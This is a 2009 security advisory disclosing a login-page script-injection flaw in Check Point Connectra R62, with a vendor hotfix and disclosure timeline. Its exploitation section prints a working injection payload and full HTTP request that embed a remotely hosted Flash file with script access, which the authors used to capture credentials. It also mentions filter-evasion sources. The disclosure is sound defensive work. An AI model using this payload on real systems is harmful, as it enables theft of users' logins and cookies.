[scip_Advisory 4020] Check Point Connectra R62 Login Script Injection Vulnerability

Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020

I. INTRODUCTION

Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.

More information is available on the official product web site at the
following URL[1]:

http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.

The initial logon script at /Login/Login, that is being used for
unauthenticated users to log in, fails to perform proper input
validation on the data that is being submitted via HTTP POST. While
certain fields are escaped before being sent back to users browser, the
parameter "vpid_prefix" lacks any validation and is therefore vulnerable
to script injection.
Other parts of the application might be affected too.

This vulnerability has been tested on version R62, other versions might
be affected as well.

III. EXPLOITATION

Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using easy exploiting strings containing substrings like
"script", "javascript", "alert" or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnakes popular XSS Cheat Sheet[2], which contains several patterns not
being detected by the filter in place, allowing you execute any
arbitrary, externally hosted payload.

We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.=20

Vulnerable Variable Value:

vpid_prefix =3D "><embed/src=3D"http://www.scip.ch/p/s/w/ccs.swf"=20
allowScriptAccess=3Dalways><a name=3D"

--- CUT ---
POST https://TARGET:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
Gecko/20090729 Firefox/3.5.2
Accept: =
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-us,en;q=3D0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=3D0.7,*;q=3D0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=3D
Cookie: CheckCookieSupport=3D1; ICSCookie=3D***purged***; =
user_locale=3Den_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153

loginType=3DStandard&userName=3D&vpid_prefix=3D"><embed/src=3D"http://www=
.scip.c
h/p/s/w/ccs.swf"=20
allowScriptAccess=3Dalways><a name=3D"
&password=3D&HeightData=3D1147&Login=3DSign+In

--- CUT END ---

Response Snippet:

--- CUT ---
<input type=3D"hidden" id=3D"vpid_prefix" name=3D"vpid_prefix"
value=3D""><embed/src=3D"http://www.scip.ch/p/s/w/ccs.swf"
allowScriptAccess=3Dalways><a name=3D"">
--- CUT END ---

IV. IMPACT

Because non-authenticated parts of the software are affected, this
vulnerability is serious for every secure environment. Non-authenticated
users might be able to exploit this flaw to gain elevated privileges in
the target environment (e.g. extracting sensitive cookie information or
login information) or to perform any other form of web-based attacks.
Due to the fact that the application will often be allowed to make use
of ActiveX, it can also be used as a springboard to inject other
payloads, for example MS09-037[3] or any other vulnerability disclosed
lately, that might be exploited using a web browser.

Because other parts of the application might be affected too - this
could include some second order vulnerabilities - a severe attack
scenario might be possible.

V. DETECTION

Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single () or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like <script> and attack
attributes onMouseOver too. However, these are usually not capable of
identifying highly optimized payload.

VI. SOLUTION

Check Point provides a hotfix for the vulnerability which should be
installed on vulnerable systems

VII. VENDOR RESPONSE

Check Point acknowledged the problem and provides a hotfix for the
vulnerability.
Detailed information on the issue, maintained by Check Point, can be
found at:
https://supportcenter.checkpoint.com/supportcenter/portal?solutionid=3Dsk=
4
2793

VIII. SOURCES

scip AG - Security Consulting Information Process (german)
http://www.scip.ch/

scip AG Vulnerability Database (german)
http://www.scip.ch/?vuldb.4020

IX. DISCLOSURE TIMELINE

2009/09/04 Identification of the vulnerability, Vendor is being
notified.
2009/09/04 Check Point confirms the receipt of the notification
2009/09/04 scip AG confirms status and procedure
2009/09/06 Check Point confirms the existence of the flaw, agrees on the
proposed timeline for coordinated release and announces a hotfix
2009/09/06 scip AG confirms status and procedure
2009/09/16 Check Point states that the hotfix is currently in QA and
will be ready for coordinated release within the next week
2009/09/21 Check Point is ready to release the hotfix and a public
vendor response
2009/09/21 scip AG confirms and coordinates public release of
advisory/vendor response/hotfix

X. CREDITS

The vulnerabilities were discovered by Stefan Friedli.

    Stefan Friedli, scip AG, Zuerich, Switzerland
    stfr-at-scip.ch
    http://www.scip.ch/

A1. BIBLIOGRAPHY

[1] Connectra Official Vendor Information, Check Point
http://www.checkpoint.com/products/connectra/index.html

[2] XSS Cheat Sheet, RSnake
http://ha.ckers.org/xss.html

[3] Microsoft Security Bulletin MS09-037 - Critical, Microsoft
http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx

[4] Check Point Vendor-Response on this issue
https://supportcenter.checkpoint.com/supportcenter/LoginRedirect.jsp?toU
RL=3DeventSubmit_doGoviewsolutiondetails=3D%26solutionid=3Dsk42793

A2. LEGAL NOTICES

Copyright (c) 2002-2009 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.